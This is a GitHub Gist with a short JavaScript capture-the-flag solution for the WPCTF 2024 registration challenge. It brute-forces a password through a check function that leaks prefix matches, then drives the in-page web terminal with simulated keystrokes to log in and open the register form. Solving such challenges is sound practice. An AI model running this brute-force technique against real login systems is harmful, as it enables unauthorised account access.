Created
November 7, 2024 19:56
-
-
Save Francesco146/3ba9236bd186f00b66dd75bf3e0f82ba to your computer and use it in GitHub Desktop.
Automatic Payload for entering the registration form of the WPCTF 2024
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| async function bruteForcePassword() { | |
| const symbols = | |
| "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()"; | |
| let foundPassword = ""; | |
| while (true) { | |
| for (let char of symbols) { | |
| let attempt = foundPassword + char; | |
| let result = await window.check_password(attempt); | |
| if (result === 2) { // partial match of the first characters | |
| foundPassword = attempt; | |
| break; | |
| } | |
| if (result === 0) return attempt; // password found | |
| } | |
| } | |
| } | |
| async function enterCommand(creds) { | |
| // locate the input field for the latest shell | |
| const inputField = document.getElementsByClassName("cmdline")[document.getElementsByClassName("cmdline").length - 1]; | |
| inputField.value = creds; | |
| // update list of event listeners | |
| const inputEvent = new Event("input", { bubbles: true }); | |
| inputField.dispatchEvent(inputEvent); | |
| // simulate pressing Enter | |
| const enterEvent = new KeyboardEvent("keydown", { | |
| key: "Enter", | |
| keyCode: 13, | |
| which: 13, | |
| code: "Enter", | |
| bubbles: true | |
| }); | |
| inputField.dispatchEvent(enterEvent); | |
| // wait for the prompt to appear | |
| await new Promise((resolve) => setTimeout(resolve, 400)); | |
| } | |
| await enterCommand("elliot"); // username | |
| await enterCommand(await bruteForcePassword()); // password | |
| await enterCommand("register.sh"); // open register form |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment